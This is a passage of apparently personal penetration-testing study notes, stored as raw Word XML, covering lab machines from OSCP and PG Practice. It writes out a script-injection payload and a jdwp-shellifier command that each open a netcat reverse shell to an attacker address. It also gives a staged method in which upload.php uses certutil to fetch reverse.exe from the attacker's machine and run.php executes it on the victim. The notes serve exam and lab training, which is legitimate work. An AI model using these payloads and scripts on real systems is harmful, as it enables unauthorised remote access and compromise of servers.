    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used this as my payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77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${script:javascript:java.lang.Runtime.getRuntime().exec(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'busybox nc 192.168.45.232 4444 -e sh'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)}</w:t>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t xml:space="preserve">Here is what we did in OSCP-B .150 for priv esc. We had command execution using exploit, but nc didn't work, so we used busybox and it worked. Same busybox payload as before:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we run exploit. notice we had to use busybox, just like in the foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1290"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 jdwp-shellifier.py -t 127.0.0.1 --cmd '</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox nc 192.168.45.232 4444 -e /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_82ldiuvu0up" w:id="127"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upload and execute reverse shell upload.php and run.php (Staged Reverse Shell via Web Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The point of this strategy is to trigger the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell. It's not a PHP shell, so you can't just trigger it by accessing it on the web page. You need a run.php to trigger it. </w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the web server runs PHP, then try a variety of PHP shells first since it's much simpler than this strategy. For example, if you are targeting windows, try the PHP Ivan Sincek shell (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId318">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">revshells.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) since it works well for windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1435"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is important to note that if a web server is running PHP, t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hen simply visiting a .php reverse shell via the web will trigger it (like visiting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.10.10/reverse.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So, no need for all this upload and run stuff. But, this is a really good strategy if PHP rev shells are blocked or are just not working, and you need to switch to like a .exe shell</w:t>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t xml:space="preserve">Another name for this would be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged Reverse Shell via Web Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" since it comes in multiple "stages" and involves web execution</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This only works though if the website is running PHP. Possibly could work if you change upload.php and run.php to another language, but this is never seen. I asked chatGPT to generate upload.php for this case, and you can look at that sub–section below</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t xml:space="preserve">And this only works for .exe payloads, but I asked chatGPT to create run.php for non .exe payloads, so you could possibly try that in case the target machine is a Linux</w:t>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t xml:space="preserve">First seen in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId319">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">AuthBy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>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t xml:space="preserve">Also seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId320">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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Generate reverse shell executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put it in a file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse.exe</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Prepare PHP scripts to deliver &amp; execute the payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You create two PHP scripts:</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$download = system('certutil.exe -urlcache -split -f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.49.243:80/reverse.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBD">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EBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When this script runs, it will try and download the reverse.exe from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> your local Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (replace the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.243:80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and save it on it's own server as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The 80 is for port 80, so replace it with whatever you are use for python host</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses Windows built-in certutil.exe to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-urlcache -split -f: download a file from a remote URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads your reverse shell executable (reverse.exe) from your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Saves it as reverse.exe on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So this script pulls the malware onto the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this script, $val will contain 0 if the command succeeded, or a non-zero value if it failed.</w:t>
      </w:r>
    </w:p>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EC9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">causes PHP to immediately print the output of the command as it comes in (this is different from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which captures it silently).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe on the victim machine, triggering the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to execute a reverse shell using PHP code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ECF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId321">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we saw another run.php file</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('C:/Users/Jerren/Desktop/reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$val </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an optional second parameter to system().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It captures the exit status code of the executed command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this script, $val will contain 0 if the command succeeded, or a non-zero value if it failed.</w:t>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highlight w:val="yellow"/>
